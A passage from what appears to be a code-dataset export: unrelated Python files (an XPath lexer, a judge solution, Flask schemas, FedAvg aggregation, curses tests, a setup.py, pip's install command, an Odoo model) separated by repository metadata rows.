"OC", "OP", "P", "PLUS", "POUND", "PP", "QM", "SC", "SLASH",
"SS", "STAR", "KW_ANCESTOR", "KW_ANCESTOR_OR_SELF", "KW_AND",
"KW_ATTRIBUTE", "KW_CHILD", "KW_COMMENT", "KW_DESCENDANT", "KW_DESCENDANT_OR_SELF",
"KW_FOLLOWING", "KW_FOLLOWING_SIBLING", "KW_NODE", "KW_NOT",
"KW_OR", "KW_PARENT", "KW_PRECEDING", "KW_PRECEDING_SIBLING",
"KW_PROCESSING_INSTRUCTION", "KW_SELF", "KW_TEXT", "IntegerLiteral",
"StringLiteral", "WS" ]
ruleNames = [ "T__0", "AXES", "NODE_NAME", "DOCUMENT_NAME", "PREDICATE_OPERATOR",
"PREDICATE_CONNECTIVES", "AT", "BANG", "CB", "CC", "CEQ",
"COLON", "COLONCOLON", "COMMA", "CP", "CS", "D", "DD",
"DOLLAR", "EG", "EQ", "GE", "GG", "GT", "LE", "LL", "LT",
"MINUS", "NE", "OB", "OC", "OP", "P", "PLUS", "POUND",
"PP", "QM", "SC", "SLASH", "SS", "STAR", "KW_ANCESTOR",
"KW_ANCESTOR_OR_SELF", "KW_AND", "KW_ATTRIBUTE", "KW_CHILD",
"KW_COMMENT", "KW_DESCENDANT", "KW_DESCENDANT_OR_SELF",
"KW_FOLLOWING", "KW_FOLLOWING_SIBLING", "KW_NODE", "KW_NOT",
"KW_OR", "KW_PARENT", "KW_PRECEDING", "KW_PRECEDING_SIBLING",
"KW_PROCESSING_INSTRUCTION", "KW_SELF", "KW_TEXT", "IntegerLiteral",
"StringLiteral", "FragEscapeQuot", "FragEscapeApos", "FragDigits",
"WS" ]
grammarFileName = "XPath.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.9.3")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
| 58.997143
| 103
| 0.557364
|
794fcef4254301fdbd3484937d106394849ac8c2
| 294
|
py
|
Python
|
BOJ/05000~05999/5000~5099/5046.py
|
shinkeonkim/today-ps
|
f3e5e38c5215f19579bb0422f303a9c18c626afa
|
[
"Apache-2.0"
] | 2
|
2020-01-29T06:54:41.000Z
|
2021-11-07T13:23:27.000Z
|
BOJ/05000~05999/5000~5099/5046.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
BOJ/05000~05999/5000~5099/5046.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
N,B,H,W =map(int,input().split())
ans = 9876543210
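# each of the H input lines holds a price p followed by W capacities;
# whenever a capacity can fit all N people and the cost p*N stays within
# the budget B, keep the cheapest such total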
for i in range(H):
p = int(input())
L = list(map(int,input().split()))
for i in L:
if i >=N:
if p*N <= B and p*N < ans:
ans = p*N
if ans == 9876543210:
print("stay home")
else:
print(ans)
| 22.615385
| 38
| 0.489796
|
794fcf0ec29ca239aa9d110da4827fe2cc52b65c
| 507
|
py
|
Python
|
flask_request_logger/schemas.py
|
passiomatic/flask-request-logger
|
bbace0a0c3ba80b87bd03f53fcec290ba7ded9aa
|
[
"MIT"
] | 5
|
2018-10-26T09:49:40.000Z
|
2022-01-13T06:40:06.000Z
|
flask_request_logger/schemas.py
|
passiomatic/flask-request-logger
|
bbace0a0c3ba80b87bd03f53fcec290ba7ded9aa
|
[
"MIT"
] | 1
|
2019-08-20T02:40:02.000Z
|
2019-08-20T02:40:02.000Z
|
flask_request_logger/schemas.py
|
passiomatic/flask-request-logger
|
bbace0a0c3ba80b87bd03f53fcec290ba7ded9aa
|
[
"MIT"
] | 4
|
2019-08-17T16:48:26.000Z
|
2021-05-25T12:02:17.000Z
|
from marshmallow import fields, Schema
from marshmallow_sqlalchemy import ModelSchema
from flask_request_logger.models import RequestLog, ResponseLog
class RequestLogSchema(ModelSchema):
class Meta:
model = RequestLog
exclude = ('response_log', )
class ResponseLogSchema(ModelSchema):
class Meta:
model = ResponseLog
exclude = ('request', )
class LogSchema(Schema):
request = fields.Nested(RequestLogSchema)
response = fields.Nested(ResponseLogSchema)
| 23.045455
| 63
| 0.733728
|
794fcf1061ffc8027cc181bac23b01bad5cb3077
| 2,063
|
py
|
Python
|
demos/HFL/algorithm/fed_avg.py
|
monadyn/fedlearn-algo
|
c4459d421139b0bb765527d636fff123bf17bda4
|
[
"Apache-2.0"
] | 86
|
2021-07-20T01:54:21.000Z
|
2021-10-06T04:02:40.000Z
|
demos/HFL/algorithm/fed_avg.py
|
fedlearnAI/fedlearnalgo
|
63d9ceb64d331ff2b5103ae49e54229cad7e2095
|
[
"Apache-2.0"
] | 5
|
2021-07-23T21:22:16.000Z
|
2021-09-12T15:48:35.000Z
|
demos/HFL/algorithm/fed_avg.py
|
fedlearnAI/fedlearnalgo
|
63d9ceb64d331ff2b5103ae49e54229cad7e2095
|
[
"Apache-2.0"
] | 28
|
2021-07-20T07:15:33.000Z
|
2021-08-22T20:04:57.000Z
|
# Copyright 2021 Fedlearn authors.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os,sys
root_path = os.getcwd()
from typing import List,Tuple,Dict,Union
from abc import abstractmethod, ABC
sys.path.append(root_path)
sys.path.append(os.path.join(root_path,'demos/HFL'))
from demos.HFL.common.param_util import(
Params,
TrainRes
)
from demos.HFL.algorithm.base_aggregation import Aggregator
class FedAvg(Aggregator):
def aggregate(self,
trainRes_list: List[TrainRes]
)->Params:
"""
Fed Avg algorithm for HFL
Parameters
---------
trainRes_list: List[TrainRes]
A list of TrainRes, each corresponds to one client's model parameters and training metrics
Returns
-------
Params: Parameters of global model
"""
w_names = trainRes_list[0].params.names
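        # weight each client's parameters by its share of the total training samples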
total_samples = sum(tr.num_samples for tr in trainRes_list)
weights = [tr.num_samples/total_samples for tr in trainRes_list]
ave_params = [([w*weights[idx] for w in tr.params.weights])
for idx,tr in enumerate(trainRes_list)]
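        # sum the weighted client tensors layer by layer to form the global model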
ave_params = [sum([ data[layer_idx] for data in ave_params])
for layer_idx in range(len(ave_params[0]))]
return Params(
names=w_names,
weights=ave_params,
weight_type='float')
| 31.738462
| 102
| 0.619001
|
794fd06da7b6aaac348173f372a080759b75e27c
| 3,325
|
py
|
Python
|
tests/interfaces/curses_interface/test_render.py
|
carlosmaniero/ascii-engine
|
47f6b6769a6ed5b2497330c9b5575c7cc8566544
|
[
"MIT"
] | 2
|
2018-03-02T17:02:30.000Z
|
2018-11-22T13:43:37.000Z
|
tests/interfaces/curses_interface/test_render.py
|
carlosmaniero/ascii-engine
|
47f6b6769a6ed5b2497330c9b5575c7cc8566544
|
[
"MIT"
] | 6
|
2018-04-10T03:31:44.000Z
|
2018-04-10T04:12:16.000Z
|
tests/interfaces/curses_interface/test_render.py
|
carlosmaniero/ascii-engine
|
47f6b6769a6ed5b2497330c9b5575c7cc8566544
|
[
"MIT"
] | null | null | null |
from unittest.mock import Mock
import pytest
import time
from ascii_engine.elements.styles import colorize
from tests.mocked_modules.curses import (mocked_curses, patch_curses,
setup_curses)
from ascii_engine.interfaces.curses_interface.render import CursesRender
from ascii_engine.screen import Screen
from ascii_engine.elements.text import Text
from ascii_engine.colors import RGB
DEFAULT_PAIR = 1
async def wait_for_render(curses_interface, event_loop):
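    # schedule a zero-second sleep on the renderer's own thread pool so any queued render job completes before the assertions run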
await event_loop.run_in_executor(
curses_interface.render_interface.pool,
time.sleep,
0
)
@patch_curses
def test_that_interface_is_well_configured():
curses_interface = CursesRender()
assert mocked_curses.initscr.called
assert mocked_curses.start_color.called
assert mocked_curses.noecho.called
assert mocked_curses.cbreak.called
curses_interface.window.keypad.assert_called_with(True)
@pytest.mark.asyncio
async def test_that_all_pixels_are_send_to_screen(event_loop):
setup_curses()
curses_interface = CursesRender()
text_element = Text('ab\ncd')
screen = Screen(2, 2)
screen.add_element(text_element)
curses_interface.render(screen)
await wait_for_render(curses_interface, event_loop)
curses_interface.window.addstr.assert_any_call(0, 0, 'a', DEFAULT_PAIR)
curses_interface.window.addstr.assert_any_call(0, 1, 'b', DEFAULT_PAIR)
curses_interface.window.addstr.assert_any_call(1, 0, 'c', DEFAULT_PAIR)
curses_interface.window.addstr.assert_any_call(1, 1, 'd', DEFAULT_PAIR)
@patch_curses
def test_that_the_terminal_is_well_reconfigured_after_stop_call():
curses_interface = CursesRender()
curses_interface.stop()
curses_interface.window.keypad.assert_called_with(False)
assert mocked_curses.nocbreak.called
assert mocked_curses.echo.called
assert mocked_curses.endwin.called
@pytest.mark.asyncio
async def test_that_given_a_foreground_and_background_a_curses_pair_is_created(
event_loop):
setup_curses()
text_element = Text('ab\ncd')
expected_fg = RGB(0, 0, 0)
expected_bg = RGB(128, 0, 0)
expected_color_pair = 1
mocked_curses.color_pair = Mock(return_value='color_1')
text_element.set_style([
colorize(expected_fg, expected_bg)
])
screen = Screen(2, 2)
screen.add_element(text_element)
curses_interface = CursesRender()
curses_interface.render(screen)
await wait_for_render(curses_interface, event_loop)
mocked_curses.init_pair.assert_called_once_with(
expected_color_pair,
expected_fg.calculate_term_color(),
expected_bg.calculate_term_color()
)
curses_interface.window.addstr.assert_any_call(0, 0, 'a', 'color_1')
curses_interface.window.addstr.assert_any_call(0, 1, 'b', 'color_1')
curses_interface.window.addstr.assert_any_call(1, 0, 'c', 'color_1')
curses_interface.window.addstr.assert_any_call(1, 1, 'd', 'color_1')
def test_that_the_interface_returns_the_screen_with_terminal_size():
curses_interface = CursesRender()
curses_interface.window = Mock()
curses_interface.window.getmaxyx = Mock(return_value=(10, 20))
screen = curses_interface.create_empty_screen()
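    # the returned screen is expected to be one column narrower than the reported terminal size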
assert screen.get_width() == 19
assert screen.get_height() == 10
| 31.971154
| 79
| 0.754887
|
794fd3ed8006763c681b85b856f90cacab4c03be
| 1,042
|
py
|
Python
|
setup.py
|
kowaalczyk/reformer-tts
|
4d39bf0677fb34298f1bf88f17c6623d5a96de80
|
[
"MIT"
] | 6
|
2020-06-22T18:01:07.000Z
|
2021-09-22T02:46:41.000Z
|
setup.py
|
kowaalczyk/reformer-tts
|
4d39bf0677fb34298f1bf88f17c6623d5a96de80
|
[
"MIT"
] | null | null | null |
setup.py
|
kowaalczyk/reformer-tts
|
4d39bf0677fb34298f1bf88f17c6623d5a96de80
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup(
name="reformer_tts",
version="0.1",
packages=find_packages(include=('reformer_tts', 'reformer_tts.*')),
python_requires=">=3.8",
install_requires=[
"dacite==1.4.0",
"dvc==0.88",
"Click==7",
"pytorch-lightning==0.7.6",
"PyYAML==5.1.2",
"tqdm==4.43.0",
"beautifulsoup4==4.8.2",
"requests==2.23.0",
"reformer-pytorch==0.19.1",
"demjson==2.2.4",
"torch==1.4.0",
"torchvision==0.5.0",
"torchaudio==0.4.0",
"scipy==1.4.1",
"ffmpeg-python==0.2.0",
"matplotlib==3.1.3",
"librosa==0.7.2",
"unidecode==1.1.1",
"nltk==3.4.5",
"g2p-en==2.1.0",
"pydub==0.23.1",
"psutil==5.7.0",
"pandas==1.0.3",
"google-cloud-storage==1.28.1",
"pytest==5.4.2",
"transformers==2.11.0",
],
entry_points="""
[console_scripts]
reformercli=reformer_tts.cli:cli
""",
)
| 25.414634
| 71
| 0.485605
|
794fd4374386f93b8974b22499ebc7ea422e18d8
| 90
|
py
|
Python
|
app/__init__.py
|
gabrielx52/lineup
|
2590d29cac45d84d9d810b50cc201130238dd936
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
gabrielx52/lineup
|
2590d29cac45d84d9d810b50cc201130238dd936
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
gabrielx52/lineup
|
2590d29cac45d84d9d810b50cc201130238dd936
|
[
"MIT"
] | null | null | null |
"""Init script."""
from flask import Flask
app = Flask(__name__)
from app import routes
| 12.857143
| 23
| 0.722222
|
794fd459299266a6600a912e0418b5dfdf58d812
| 26,702
|
py
|
Python
|
vut/lib/python3.8/site-packages/pipenv/patched/notpip/_internal/commands/install.py
|
dan-mutua/djangowk1
|
1e5dcb6443ef21451e21845ec639198719e11b10
|
[
"MIT"
] | 18,636
|
2017-12-06T14:53:18.000Z
|
2022-03-31T13:12:34.000Z
|
vut/lib/python3.8/site-packages/pipenv/patched/notpip/_internal/commands/install.py
|
dan-mutua/djangowk1
|
1e5dcb6443ef21451e21845ec639198719e11b10
|
[
"MIT"
] | 3,640
|
2017-12-06T16:58:35.000Z
|
2022-03-31T22:20:57.000Z
|
vut/lib/python3.8/site-packages/pipenv/patched/notpip/_internal/commands/install.py
|
dan-mutua/djangowk1
|
1e5dcb6443ef21451e21845ec639198719e11b10
|
[
"MIT"
] | 1,987
|
2017-12-06T15:04:51.000Z
|
2022-03-26T10:05:15.000Z
|
# The following comment should be removed at some point in the future.
# It's included for now because without it InstallCommand.run() has a
# couple errors where we have to know req.name is str rather than
# Optional[str] for the InstallRequirement req.
# mypy: strict-optional=False
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import errno
import logging
import operator
import os
import shutil
import site
from optparse import SUPPRESS_HELP
from pipenv.patched.notpip._vendor import pkg_resources
from pipenv.patched.notpip._vendor.packaging.utils import canonicalize_name
from pipenv.patched.notpip._internal.cache import WheelCache
from pipenv.patched.notpip._internal.cli import cmdoptions
from pipenv.patched.notpip._internal.cli.cmdoptions import make_target_python
from pipenv.patched.notpip._internal.cli.req_command import RequirementCommand
from pipenv.patched.notpip._internal.cli.status_codes import ERROR, SUCCESS
from pipenv.patched.notpip._internal.exceptions import (
CommandError,
InstallationError,
PreviousBuildDirError,
)
from pipenv.patched.notpip._internal.locations import distutils_scheme
from pipenv.patched.notpip._internal.operations.check import check_install_conflicts
from pipenv.patched.notpip._internal.req import RequirementSet, install_given_reqs
from pipenv.patched.notpip._internal.req.req_tracker import get_requirement_tracker
from pipenv.patched.notpip._internal.utils.deprecation import deprecated
from pipenv.patched.notpip._internal.utils.distutils_args import parse_distutils_args
from pipenv.patched.notpip._internal.utils.filesystem import test_writable_dir
from pipenv.patched.notpip._internal.utils.misc import (
ensure_dir,
get_installed_version,
protect_pip_from_modification_on_windows,
write_output,
)
from pipenv.patched.notpip._internal.utils.temp_dir import TempDirectory
from pipenv.patched.notpip._internal.utils.typing import MYPY_CHECK_RUNNING
from pipenv.patched.notpip._internal.utils.virtualenv import virtualenv_no_global
from pipenv.patched.notpip._internal.wheel_builder import build, should_build_for_install_command
if MYPY_CHECK_RUNNING:
from optparse import Values
from typing import Any, Iterable, List, Optional
from pipenv.patched.notpip._internal.models.format_control import FormatControl
from pipenv.patched.notpip._internal.req.req_install import InstallRequirement
from pipenv.patched.notpip._internal.wheel_builder import BinaryAllowedPredicate
logger = logging.getLogger(__name__)
def get_check_binary_allowed(format_control):
# type: (FormatControl) -> BinaryAllowedPredicate
def check_binary_allowed(req):
# type: (InstallRequirement) -> bool
if req.use_pep517:
return True
canonical_name = canonicalize_name(req.name)
allowed_formats = format_control.get_allowed_formats(canonical_name)
return "binary" in allowed_formats
return check_binary_allowed
class InstallCommand(RequirementCommand):
"""
Install packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports installing from "requirements files", which provide
an easy way to specify a whole environment to be installed.
"""
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
def __init__(self, *args, **kw):
super(InstallCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.pre())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(
'-t', '--target',
dest='target_dir',
metavar='dir',
default=None,
help='Install packages into <dir>. '
'By default this will not replace existing files/folders in '
'<dir>. Use --upgrade to replace existing packages in <dir> '
'with new versions.'
)
cmdoptions.add_target_python_options(cmd_opts)
cmd_opts.add_option(
'--user',
dest='use_user_site',
action='store_true',
help="Install to the Python user install directory for your "
"platform. Typically ~/.local/, or %APPDATA%\\Python on "
"Windows. (See the Python documentation for site.USER_BASE "
"for full details.)")
cmd_opts.add_option(
'--no-user',
dest='use_user_site',
action='store_false',
help=SUPPRESS_HELP)
cmd_opts.add_option(
'--root',
dest='root_path',
metavar='dir',
default=None,
help="Install everything relative to this alternate root "
"directory.")
cmd_opts.add_option(
'--prefix',
dest='prefix_path',
metavar='dir',
default=None,
help="Installation prefix where lib, bin and other top-level "
"folders are placed")
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all specified packages to the newest available '
'version. The handling of dependencies depends on the '
'upgrade-strategy used.'
)
cmd_opts.add_option(
'--upgrade-strategy',
dest='upgrade_strategy',
default='only-if-needed',
choices=['only-if-needed', 'eager'],
help='Determines how dependency upgrading should be handled '
'[default: %default]. '
'"eager" - dependencies are upgraded regardless of '
'whether the currently installed version satisfies the '
'requirements of the upgraded package(s). '
'"only-if-needed" - are upgraded only when they do not '
'satisfy the requirements of the upgraded package(s).'
)
cmd_opts.add_option(
'--force-reinstall',
dest='force_reinstall',
action='store_true',
help='Reinstall all packages even if they are already '
'up-to-date.')
cmd_opts.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages, overwriting them. '
'This can break your system if the existing package '
'is of a different version or was installed '
'with a different package manager!'
)
cmd_opts.add_option(cmdoptions.ignore_requires_python())
cmd_opts.add_option(cmdoptions.no_build_isolation())
cmd_opts.add_option(cmdoptions.use_pep517())
cmd_opts.add_option(cmdoptions.no_use_pep517())
cmd_opts.add_option(cmdoptions.install_options())
cmd_opts.add_option(cmdoptions.global_options())
cmd_opts.add_option(
"--compile",
action="store_true",
dest="compile",
default=True,
help="Compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-compile",
action="store_false",
dest="compile",
help="Do not compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-warn-script-location",
action="store_false",
dest="warn_script_location",
default=True,
help="Do not warn when installing scripts outside PATH",
)
cmd_opts.add_option(
"--no-warn-conflicts",
action="store_false",
dest="warn_about_conflicts",
default=True,
help="Do not warn about broken dependencies",
)
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(cmdoptions.prefer_binary())
cmd_opts.add_option(cmdoptions.no_clean())
cmd_opts.add_option(cmdoptions.require_hashes())
cmd_opts.add_option(cmdoptions.progress_bar())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def run(self, options, args):
# type: (Values, List[Any]) -> int
cmdoptions.check_install_build_global(options)
upgrade_strategy = "to-satisfy-only"
if options.upgrade:
upgrade_strategy = options.upgrade_strategy
cmdoptions.check_dist_restriction(options, check_target=True)
install_options = options.install_options or []
options.use_user_site = decide_user_install(
options.use_user_site,
prefix_path=options.prefix_path,
target_dir=options.target_dir,
root_path=options.root_path,
isolated_mode=options.isolated_mode,
)
target_temp_dir = None # type: Optional[TempDirectory]
target_temp_dir_path = None # type: Optional[str]
if options.target_dir:
options.ignore_installed = True
options.target_dir = os.path.abspath(options.target_dir)
if (os.path.exists(options.target_dir) and not
os.path.isdir(options.target_dir)):
raise CommandError(
"Target path exists but is not a directory, will not "
"continue."
)
# Create a target directory for using with the target option
target_temp_dir = TempDirectory(kind="target")
target_temp_dir_path = target_temp_dir.path
global_options = options.global_options or []
session = self.get_default_session(options)
target_python = make_target_python(options)
finder = self._build_package_finder(
options=options,
session=session,
target_python=target_python,
ignore_requires_python=options.ignore_requires_python,
)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
with get_requirement_tracker() as req_tracker, TempDirectory(
options.build_dir, delete=build_delete, kind="install"
) as directory:
requirement_set = RequirementSet(
check_supported_wheels=not options.target_dir,
)
try:
self.populate_requirement_set(
requirement_set, args, options, finder, session,
wheel_cache
)
warn_deprecated_install_options(
requirement_set, options.install_options
)
preparer = self.make_requirement_preparer(
temp_build_dir=directory,
options=options,
req_tracker=req_tracker,
session=session,
finder=finder,
use_user_site=options.use_user_site,
)
resolver = self.make_resolver(
preparer=preparer,
finder=finder,
options=options,
wheel_cache=wheel_cache,
use_user_site=options.use_user_site,
ignore_installed=options.ignore_installed,
ignore_requires_python=options.ignore_requires_python,
force_reinstall=options.force_reinstall,
upgrade_strategy=upgrade_strategy,
use_pep517=options.use_pep517,
)
self.trace_basic_info(finder)
resolver.resolve(requirement_set)
try:
pip_req = requirement_set.get_requirement("pip")
except KeyError:
modifying_pip = None
else:
# If we're not replacing an already installed pip,
# we're not modifying it.
modifying_pip = getattr(pip_req, "satisfied_by", None) is None
protect_pip_from_modification_on_windows(
modifying_pip=modifying_pip
)
check_binary_allowed = get_check_binary_allowed(
finder.format_control
)
reqs_to_build = [
r for r in requirement_set.requirements.values()
if should_build_for_install_command(
r, check_binary_allowed
)
]
_, build_failures = build(
reqs_to_build,
wheel_cache=wheel_cache,
build_options=[],
global_options=[],
)
# If we're using PEP 517, we cannot do a direct install
# so we fail here.
# We don't care about failures building legacy
# requirements, as we'll fall through to a direct
# install for those.
pep517_build_failures = [
r for r in build_failures if r.use_pep517
]
if pep517_build_failures:
raise InstallationError(
"Could not build wheels for {} which use"
" PEP 517 and cannot be installed directly".format(
", ".join(r.name for r in pep517_build_failures)))
to_install = resolver.get_installation_order(
requirement_set
)
# Consistency Checking of the package set we're installing.
should_warn_about_conflicts = (
not options.ignore_dependencies and
options.warn_about_conflicts
)
if should_warn_about_conflicts:
self._warn_about_conflicts(to_install)
# Don't warn about script install locations if
# --target has been specified
warn_script_location = options.warn_script_location
if options.target_dir:
warn_script_location = False
installed = install_given_reqs(
to_install,
install_options,
global_options,
root=options.root_path,
home=target_temp_dir_path,
prefix=options.prefix_path,
pycompile=options.compile,
warn_script_location=warn_script_location,
use_user_site=options.use_user_site,
)
lib_locations = get_lib_location_guesses(
user=options.use_user_site,
home=target_temp_dir_path,
root=options.root_path,
prefix=options.prefix_path,
isolated=options.isolated_mode,
)
working_set = pkg_resources.WorkingSet(lib_locations)
installed.sort(key=operator.attrgetter('name'))
items = []
for result in installed:
item = result.name
try:
installed_version = get_installed_version(
result.name, working_set=working_set
)
if installed_version:
item += '-' + installed_version
except Exception:
pass
items.append(item)
installed_desc = ' '.join(items)
if installed_desc:
write_output(
'Successfully installed %s', installed_desc,
)
except EnvironmentError as error:
show_traceback = (self.verbosity >= 1)
message = create_env_error_message(
error, show_traceback, options.use_user_site,
)
logger.error(message, exc_info=show_traceback)
return ERROR
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
# Clean up
if not options.no_clean:
requirement_set.cleanup_files()
wheel_cache.cleanup()
if options.target_dir:
self._handle_target_dir(
options.target_dir, target_temp_dir, options.upgrade
)
return SUCCESS
def _handle_target_dir(self, target_dir, target_temp_dir, upgrade):
ensure_dir(target_dir)
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
lib_dir_list = []
with target_temp_dir:
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
scheme = distutils_scheme('', home=target_temp_dir.path)
purelib_dir = scheme['purelib']
platlib_dir = scheme['platlib']
data_dir = scheme['data']
if os.path.exists(purelib_dir):
lib_dir_list.append(purelib_dir)
if os.path.exists(platlib_dir) and platlib_dir != purelib_dir:
lib_dir_list.append(platlib_dir)
if os.path.exists(data_dir):
lib_dir_list.append(data_dir)
for lib_dir in lib_dir_list:
for item in os.listdir(lib_dir):
if lib_dir == data_dir:
ddir = os.path.join(data_dir, item)
if any(s.startswith(ddir) for s in lib_dir_list[:-1]):
continue
target_item_dir = os.path.join(target_dir, item)
if os.path.exists(target_item_dir):
if not upgrade:
logger.warning(
'Target directory %s already exists. Specify '
'--upgrade to force replacement.',
target_item_dir
)
continue
if os.path.islink(target_item_dir):
logger.warning(
'Target directory %s already exists and is '
'a link. Pip will not automatically replace '
'links, please remove if replacement is '
'desired.',
target_item_dir
)
continue
if os.path.isdir(target_item_dir):
shutil.rmtree(target_item_dir)
else:
os.remove(target_item_dir)
shutil.move(
os.path.join(lib_dir, item),
target_item_dir
)
def _warn_about_conflicts(self, to_install):
try:
package_set, _dep_info = check_install_conflicts(to_install)
except Exception:
logger.error("Error checking for conflicts.", exc_info=True)
return
missing, conflicting = _dep_info
# NOTE: There is some duplication here from pipenv.patched.notpip check
for project_name in missing:
version = package_set[project_name][0]
for dependency in missing[project_name]:
logger.critical(
"%s %s requires %s, which is not installed.",
project_name, version, dependency[1],
)
for project_name in conflicting:
version = package_set[project_name][0]
for dep_name, dep_version, req in conflicting[project_name]:
logger.critical(
"%s %s has requirement %s, but you'll have %s %s which is "
"incompatible.",
project_name, version, req, dep_name, dep_version,
)
def get_lib_location_guesses(*args, **kwargs):
scheme = distutils_scheme('', *args, **kwargs)
return [scheme['purelib'], scheme['platlib']]
def site_packages_writable(**kwargs):
return all(
test_writable_dir(d) for d in set(get_lib_location_guesses(**kwargs))
)
def decide_user_install(
use_user_site, # type: Optional[bool]
prefix_path=None, # type: Optional[str]
target_dir=None, # type: Optional[str]
root_path=None, # type: Optional[str]
isolated_mode=False, # type: bool
):
# type: (...) -> bool
"""Determine whether to do a user install based on the input options.
If use_user_site is False, no additional checks are done.
If use_user_site is True, it is checked for compatibility with other
options.
If use_user_site is None, the default behaviour depends on the environment,
which is provided by the other arguments.
"""
# In some cases (config from tox), use_user_site can be set to an integer
# rather than a bool, which 'use_user_site is False' wouldn't catch.
if (use_user_site is not None) and (not use_user_site):
logger.debug("Non-user install by explicit request")
return False
if use_user_site:
if prefix_path:
raise CommandError(
"Can not combine '--user' and '--prefix' as they imply "
"different installation locations"
)
if virtualenv_no_global():
raise InstallationError(
"Can not perform a '--user' install. User site-packages "
"are not visible in this virtualenv."
)
logger.debug("User install by explicit request")
return True
# If we are here, user installs have not been explicitly requested/avoided
assert use_user_site is None
# user install incompatible with --prefix/--target
if prefix_path or target_dir:
logger.debug("Non-user install due to --prefix or --target option")
return False
# If user installs are not enabled, choose a non-user install
if not site.ENABLE_USER_SITE:
logger.debug("Non-user install because user site-packages disabled")
return False
# If we have permission for a non-user install, do that,
# otherwise do a user install.
if site_packages_writable(root=root_path, isolated=isolated_mode):
logger.debug("Non-user install because site-packages writeable")
return False
logger.info("Defaulting to user installation because normal site-packages "
"is not writeable")
return True
def warn_deprecated_install_options(requirement_set, options):
# type: (RequirementSet, Optional[List[str]]) -> None
"""If any location-changing --install-option arguments were passed for
requirements or on the command-line, then show a deprecation warning.
"""
def format_options(option_names):
# type: (Iterable[str]) -> List[str]
return ["--{}".format(name.replace("_", "-")) for name in option_names]
requirements = (
requirement_set.unnamed_requirements +
list(requirement_set.requirements.values())
)
offenders = []
for requirement in requirements:
install_options = requirement.options.get("install_options", [])
location_options = parse_distutils_args(install_options)
if location_options:
offenders.append(
"{!r} from {}".format(
format_options(location_options.keys()), requirement
)
)
if options:
location_options = parse_distutils_args(options)
if location_options:
offenders.append(
"{!r} from command line".format(
format_options(location_options.keys())
)
)
if not offenders:
return
deprecated(
reason=(
"Location-changing options found in --install-option: {}. "
"This configuration may cause unexpected behavior and is "
"unsupported.".format(
"; ".join(offenders)
)
),
replacement=(
"using pip-level options like --user, --prefix, --root, and "
"--target"
),
gone_in="20.2",
issue=7309,
)
def create_env_error_message(error, show_traceback, using_user_site):
"""Format an error message for an EnvironmentError
It may occur anytime during the execution of the install command.
"""
parts = []
# Mention the error if we are not going to show a traceback
parts.append("Could not install packages due to an EnvironmentError")
if not show_traceback:
parts.append(": ")
parts.append(str(error))
else:
parts.append(".")
    # Split the error indication from a helper message (if any)
parts[-1] += "\n"
# Suggest useful actions to the user:
# (1) using user site-packages or (2) verifying the permissions
if error.errno == errno.EACCES:
user_option_part = "Consider using the `--user` option"
permissions_part = "Check the permissions"
if not using_user_site:
parts.extend([
user_option_part, " or ",
permissions_part.lower(),
])
else:
parts.append(permissions_part)
parts.append(".\n")
return "".join(parts).strip() + "\n"
| 38.037037
| 97
| 0.58696
|
794fd4c2d15c3142a462c1cf48c79fa20bfb1952
| 7,576
|
py
|
Python
|
is_export_edi.py
|
tonygalmiche/is_plastigray
|
10669dda26f5a8653371a52798f41fdc805c61f2
|
[
"MIT"
] | 1
|
2018-12-29T08:34:25.000Z
|
2018-12-29T08:34:25.000Z
|
is_export_edi.py
|
tonygalmiche/is_plastigray
|
10669dda26f5a8653371a52798f41fdc805c61f2
|
[
"MIT"
] | null | null | null |
is_export_edi.py
|
tonygalmiche/is_plastigray
|
10669dda26f5a8653371a52798f41fdc805c61f2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from openerp import models,fields,api
from openerp.tools.translate import _
from openerp.exceptions import Warning
import os
# TODO:
# - Create the EDI import for this file (edi type = odoo)
class is_export_edi(models.Model):
_name='is.export.edi'
_order='name desc'
@api.depends('code')
def _compute(self):
for obj in self:
partner_id=False
if obj.code:
